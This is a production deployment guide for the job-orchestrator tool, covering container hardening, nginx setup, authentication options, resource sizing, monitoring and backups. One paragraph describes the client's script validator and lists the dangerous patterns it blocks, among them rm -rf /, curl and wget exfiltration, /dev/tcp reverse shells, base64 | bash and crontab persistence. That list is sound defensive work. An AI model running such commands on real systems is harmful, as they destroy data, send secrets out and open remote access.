Production Deployment

This guide covers best practices for deploying job-orchestrator in production environments.

Architecture Recommendations

Minimum Setup

┌─────────────┐     ┌─────────────┐
│   Server    │────▶│   Client    │
│ (1 instance)│     │ (1 instance)│
└─────────────┘     └─────────────┘

Recommended Setup

                    ┌──────────────┐
                    │ Load Balancer│
                    │   (nginx)    │
                    └──────┬───────┘
                           │
                    ┌──────▼───────┐
                    │    Server    │
                    │  (1 instance)│
                    └──────┬───────┘
                           │
          ┌────────────────┼────────────────┐
          │                │                │
   ┌──────▼──────┐  ┌──────▼──────┐  ┌──────▼──────┐
   │  Client 1   │  │  Client 2   │  │  Client 3   │
   └─────────────┘  └─────────────┘  └─────────────┘

The client includes a built-in script validator that rejects run.sh scripts containing obviously dangerous patterns before execution. This covers destructive commands (rm -rf /, mkfs), network exfiltration tools (curl, wget, socat), reverse shells (/dev/tcp/), privilege escalation (sudo, chmod +s), container escapes (nsenter, docker), obfuscated execution (base64 | bash, python -c), persistence mechanisms (crontab, systemctl), crypto miners, and environment secret access.

This is a sanity check, not a sandbox. It can be bypassed by determined actors. Input scripts are still expected to come from trusted or semi-trusted sources. True isolation must be enforced at the deployment level using the container hardening measures below.

Container Hardening

The client executes user-submitted scripts with the full privileges of the process. Apply all of the following to limit blast radius:

Measure	Docker Compose	Purpose
Read-only rootfs	`read_only: true`	Prevent filesystem tampering
Drop all capabilities	`cap_drop: [ALL]`	Remove kernel-level privileges
No new privileges	`security_opt: [no-new-privileges:true]`	Block `setuid`/`setgid` escalation
CPU limit	`deploy.resources.limits.cpus`	Prevent CPU starvation
Memory limit	`deploy.resources.limits.memory`	Prevent OOM on host
PIDs limit	`deploy.resources.limits.pids`	Prevent fork bombs
Internal network	`networks: [internal]`	Block outbound internet access
Writable tmpfs	`tmpfs: [/tmp]`	Provide scratch space on read-only rootfs

Example (applied to the client service):

services:
  client:
    read_only: true
    cap_drop:
      - ALL
    security_opt:
      - no-new-privileges:true
    tmpfs:
      - /tmp
    deploy:
      resources:
        limits:
          cpus: "2"
          memory: 2G
          pids: 256
    networks:
      - internal

networks:
  internal:
    internal: true

Future improvement: Run the container as a non-root user (USER appuser in the Dockerfile). This requires migrating ownership of existing volumes first – see the TODO in the Dockerfile.

Network Security

Never expose clients to the internet
- Clients execute user-submitted scripts
- Use internal networks only
- Block all outbound access from client containers
Use a reverse proxy
- TLS termination
- Rate limiting
- Request filtering

Firewall rules

# Allow only orchestrator server to reach clients
iptables -A INPUT -p tcp --dport 9000 -s <server-ip> -j ACCEPT
iptables -A INPUT -p tcp --dport 9000 -j DROP

Reverse Proxy (nginx)

upstream orchestrator {
    server 127.0.0.1:5000;
}

server {
    listen 443 ssl http2;
    server_name jobs.example.com;

    ssl_certificate /etc/nginx/certs/cert.pem;
    ssl_certificate_key /etc/nginx/certs/key.pem;

    # Rate limiting
    limit_req_zone $binary_remote_addr zone=upload:10m rate=10r/s;

    location /upload {
        limit_req zone=upload burst=20 nodelay;
        client_max_body_size 400M;
        proxy_pass http://orchestrator;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }

    location /download {
        proxy_pass http://orchestrator;
        proxy_set_header Host $host;
    }

    location /health {
        proxy_pass http://orchestrator;
    }

    # Block swagger in production (optional)
    location /swagger-ui {
        deny all;
    }
}

Authentication

job-orchestrator does not implement authentication. Options:

Reverse proxy authentication

location / {
    auth_basic "Restricted";
    auth_basic_user_file /etc/nginx/.htpasswd;
    proxy_pass http://orchestrator;
}

Application-level authentication
- Wrap the API in your application
- Validate users before calling job-orchestrator
OAuth2 Proxy
- Use oauth2-proxy in front of the service
- Integrates with identity providers

Resource Planning

Server Requirements

Load Level	CPU	Memory	Storage
Light (< 100 jobs/day)	1 core	512MB	10GB
Medium (100-1000 jobs/day)	2 cores	1GB	50GB
Heavy (> 1000 jobs/day)	4 cores	2GB	100GB+

Storage depends heavily on job file sizes and retention period.

Client Requirements

Depends entirely on your job workloads:

Job Type	CPU	Memory
Text processing	1 core	512MB
Scientific computing	4-8 cores	8-16GB
ML/Deep learning	8+ cores + GPU	32GB+

Storage Calculation

Storage = (avg_job_size) × (jobs_per_day) × (retention_days)

Example:
- 10MB average job
- 500 jobs/day
- 2 day retention
= 10MB × 500 × 2 = 10GB

Monitoring

Health Checks

# Server health
curl -f http://localhost:5000/health

# Client health
curl -f http://localhost:9000/health

# Client load
curl http://localhost:9000/load

Prometheus Metrics (External)

Use a sidecar or external monitoring:

services:
  prometheus:
    image: prom/prometheus
    volumes:
      - ./prometheus.yml:/etc/prometheus/prometheus.yml

  # Monitor container metrics
  cadvisor:
    image: gcr.io/cadvisor/cadvisor
    volumes:
      - /:/rootfs:ro
      - /var/run:/var/run:ro
      - /sys:/sys:ro
      - /var/lib/docker/:/var/lib/docker:ro

Log Aggregation

services:
  server:
    logging:
      driver: "fluentd"
      options:
        fluentd-address: "localhost:24224"
        tag: "job-orchestrator.server"

Backup & Recovery

What to Backup

Server database (DB_PATH)
- Contains job history and status
- Critical for job tracking
Server data directory (DATA_PATH)
- Contains job files and results
- Large, may use incremental backups

Backup Script

#!/bin/bash
BACKUP_DIR=/backups/job-orchestrator
DATE=$(date +%Y%m%d_%H%M%S)

# Backup database
sqlite3 /opt/data/db.sqlite ".backup '${BACKUP_DIR}/db_${DATE}.sqlite'"

# Backup data (incremental with rsync)
rsync -av --delete /opt/data/ ${BACKUP_DIR}/data/

# Cleanup old backups (keep 7 days)
find ${BACKUP_DIR} -name "db_*.sqlite" -mtime +7 -delete

Recovery

# Stop server
docker compose stop server

# Restore database
cp /backups/job-orchestrator/db_latest.sqlite /opt/data/db.sqlite

# Restore data
rsync -av /backups/job-orchestrator/data/ /opt/data/

# Start server
docker compose start server

High Availability

Current Limitations

Single server architecture
No built-in clustering
SQLite doesn’t support concurrent writes

Workarounds

Quick recovery
- Automated health checks
- Container auto-restart
- Fast backup restoration
Stateless clients
- Clients can be restarted freely
- Jobs are tracked by server
Future improvements
- PostgreSQL support (planned)
- Server clustering (planned)

Maintenance

Database Maintenance

# Vacuum database (reclaim space)
sqlite3 /opt/data/db.sqlite "VACUUM;"

# Check integrity
sqlite3 /opt/data/db.sqlite "PRAGMA integrity_check;"

Log Rotation

Ensure logs don’t fill disk:

services:
  server:
    logging:
      driver: "json-file"
      options:
        max-size: "50m"
        max-file: "5"

Updates

# Pull latest image
docker pull ghcr.io/rvhonorato/job-orchestrator:latest

# Recreate containers
docker compose up -d

Troubleshooting

See Troubleshooting Guide for common issues.

job-orchestrator